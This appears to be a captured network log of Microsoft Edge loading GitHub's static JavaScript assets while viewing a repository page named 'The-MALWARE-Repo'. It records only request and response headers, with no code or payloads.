user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 18:02:04 GMT
etag: "0x8DCE49EA76E1237"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 70448
x-served-by: cache-iad-kcgs7200121-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 25, 1742
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 16d4bd5d7826c39a8c1436b2f7aab8b3f8489f56
content-length: 15611
GET

https://github.githubassets.com/assets/ui_packages_use-alive_use-alive_ts-ui_packages_code-dropdown-button_components_CodeDropdownBu-f58329-36fafde1f7a9.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_use-alive_use-alive_ts-ui_packages_code-dropdown-button_components_CodeDropdownBu-f58329-36fafde1f7a9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 11:23:46 GMT
etag: "0x8DCE467031EB359"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 89104
x-served-by: cache-iad-kjyo7100084-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 5, 2416
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ba083ef9a8d4d94270a88b3248bfa9adad425e27
content-length: 6174
GET

https://github.githubassets.com/assets/repos-overview-63b70e068491.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repos-overview-63b70e068491.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 11:23:46 GMT
etag: "0x8DCE46702E37392"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 89103
x-served-by: cache-iad-kiad7000029-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 6, 2419
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8e4b593791e89642644b9f34330a1f407b6124e9
content-length: 4736
GET

https://github.githubassets.com/assets/wp-runtime-9bee736947cd.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/wp-runtime-9bee736947cd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 11:58:00 GMT
etag: "0x8DCE46BCB4862D3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 89103
x-served-by: cache-iad-kjyo7100067-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 6, 2392
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 63283094c0cb59121017ce8d6a52f1a486c5187c
content-length: 3576
GET

https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE31279401878"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kjyo7100134-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 8040
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 164b175865dea755eb2fd0149836341589d4d759
content-length: 20356
GET

https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 13:36:48 GMT
etag: "0x8DCE47998EA76B8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 92957
x-served-by: cache-iad-kcgs7200086-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 6, 3884
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d87c150e29ab4c21e6741aabcebdf3434c57fcb4
content-length: 11156
GET

https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-76666ec8c39f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-76666ec8c39f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:58:13 GMT
etag: "0x8DCE3142ACE5AE4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85394
x-served-by: cache-iad-kjyo7100080-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 33, 2026
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 99674dd5a684f6d6a765bf2bd2e6c28d8772d52e
content-length: 8263
GET

https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:05 GMT
etag: "0x8DCE3127901F5D6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kcgs7200143-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 8007
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: dd0f0d26d24fb2019edf82269abe5c514d60e403
content-length: 4239
GET

https://github.githubassets.com/assets/environment-d0410c4d2a74.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/environment-d0410c4d2a74.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 13 Sep 2024 14:50:55 GMT
etag: "0x8DCD403787F634B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894123
x-served-by: cache-iad-kcgs7200073-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 34610
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1145797979e33e89abb221425fe3e4abeb884ca8
content-length: 4948
GET

https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12FB424"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2573932
x-served-by: cache-iad-kiad7000173-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 107, 29958
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a6ce4e69907fb84b424ba0dd3e546a25676116c5
content-length: 3911
GET

https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE312793D8352"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kiad7000133-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 7991
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8653744fee79aaadda8f57cbb7c35a2e53f68437
content-length: 6302
GET

https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 19 Sep 2024 22:11:31 GMT
etag: "0x8DCD8F8042E40EF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1027330
x-served-by: cache-iad-kcgs7200136-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 22, 32730
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0ce3d51206d8203c1cbe9596d77d5c834c51998a
content-length: 5759
GET

https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-6ce195-53781cbc550f.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-6ce195-53781cbc550f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 06 Sep 2024 21:21:21 GMT
etag: "0x8DCCEB9DAE401E8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2154473
x-served-by: cache-iad-kjyo7100107-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 10, 30379
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0846f9070653b05e40df619789512e598ab4d049
content-length: 4840
GET

https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-e40ed7658a74.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-e40ed7658a74.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 16:31:34 GMT
etag: "0x8DCE3C8D8A1F998"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 85394
x-served-by: cache-iad-kjyo7100175-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 33, 3346
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: edbb6c102d3974bb4adeab9a4d321b15df165208
content-length: 2279
GET

https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:43 GMT
etag: "0x8DCDD32D8F7A7C9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894123
x-served-by: cache-iad-kiad7000039-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 34280
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ca10325ccd49bf4a3d886ff2ad5dbc067a94bf88
content-length: 3527
GET

https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE3127990285C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 181517
x-served-by: cache-iad-kiad7000108-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 7991
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ea13f2e72567fbaa292a765b38987295c95f728d
content-length: 4463
GET

https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 19 Sep 2024 22:11:30 GMT
etag: "0x8DCD8F803DFB5F0"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1027330
x-served-by: cache-iad-kjyo7100088-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 21, 32845
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f2f91bca93c76cd0fa511492f7cae7d9ef17bfd4
content-length: 6483
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-1f651a-0cff18664748.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-1f651a-0cff18664748.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 16 Sep 2024 23:19:54 GMT
etag: "0x8DCD6A61268C08C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1553830
x-served-by: cache-iad-kcgs7200045-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 11171, 30890
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7be0f220effa4cba29a1b861b1470171d296bfeb
content-length: 4646
GET

https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-21f158-7d460d5f7704.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-21f158-7d460d5f7704.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A13028DA"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 945205
x-served-by: cache-iad-kjyo7100033-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 325, 29638
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 630ac2a3b78683322e9572f92b80fbcbe34b9b02
content-length: 3070
GET

https://github.githubassets.com/assets/github-elements-c8c1f3c48c7e.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/github-elements-c8c1f3c48c7e.js HTTP/2.0
host: github.githubassets.com
